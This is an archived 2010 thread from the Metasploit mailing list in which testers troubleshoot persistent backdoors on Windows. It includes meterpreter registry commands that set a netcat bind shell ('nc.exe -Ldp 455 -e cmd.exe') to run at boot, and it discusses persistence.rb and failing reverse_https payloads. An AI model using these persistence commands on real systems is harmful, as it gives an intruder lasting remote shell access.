Metasploit mailing list archives
Re: Persistent Backdoor
From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Sun, 10 Oct 2010 19:39:15 +0300
Same behavior with REV_HTTPS here, it is not working anymore with XP, Vista and 7 "x86", no AV. sorry for going off topic... Sherif Eldeeb. On Sun, Oct 10, 2010 at 5:52 PM, Miguel Rios <miguelrios35 () yahoo com> wrote:
Hi, Yeah I noticed the same behavior with reverse_https lately, which is why I'm using reverse_tcp for now. Reverse_https used to work very well but now I also get the timeout issue after it starts sending the initial stage. Sorry I can't really help. I can only confirm I'm getting the same issue with that payload, independently if its persistent or not. cheers --- On *Sat, 10/9/10, Tom Van de Wiele <tom.vandewiele () gmail com>* wrote: From: Tom Van de Wiele <tom.vandewiele () gmail com> Subject: Re: [framework] Persistent Backdoor To: "framework" <framework () spool metasploit com> Date: Saturday, October 9, 2010, 9:09 PM Hi, Sort of dropping into this thread, my apologies. Persistence.rb is really recommended instead of setting regkeys individually. Unless the victim has checks for the regkeys set by persistence.rb ofcourse. I have a little issue with it, in that it runs great with e.g. a windows/meterpreter/reverse_tcp payload but has anyone experienced problems with running it with a windows/meterpreter/reverse_https payload? I'm doing a file format client directed attack with another box as an exploit/multi/handler and on that box I see the reverse connection coming in from the victim to my multi/handler. I see a tcp handshake being performed but then no data being sent by the victim. After which the connection times out. I'm using reverse_https with 443/tcp as the client connecting back has to traverse a proxy server. I have tried this in another testlab with no proxy server in between (2 machines sitting in the same lan) but I get the same behavior. Using ruby1.9.1 and build svn r10585 from 2 days ago. Thank you for sharing your experiences or any pointers on how I can diagnose this further. On Mon, Oct 4, 2010 at 3:40 PM, David Kennedy <kennedyd013 () gmail com<http://mc/compose?to=kennedyd013 () gmail com>wrote:Why not use run persistence from meterpreter? On Oct 4, 2010 9:36 AM, "Eric" <dkn4a1 () gmail com<http://mc/compose?to=dkn4a1 () gmail com>> wrote:Hi, meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe" nor meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\\windows\\system32\\nc.exe -Ldp 455 -e cmd.exe" doesn't seem to work for me :-( _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework -----Inline Attachment Follows----- _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Persistent Backdoor Eric (Oct 04)
- Re: Persistent Backdoor David Kennedy (Oct 04)
- Re: Persistent Backdoor John Nash (Oct 04)
- Re: Persistent Backdoor Eric (Oct 05)
- Re: Persistent Backdoor Tom Van de Wiele (Oct 09)
- Re: Persistent Backdoor Miguel Rios (Oct 10)
- Re: Persistent Backdoor Sherif El-Deeb (Oct 10)
- Re: Persistent Backdoor David Kennedy (Oct 04)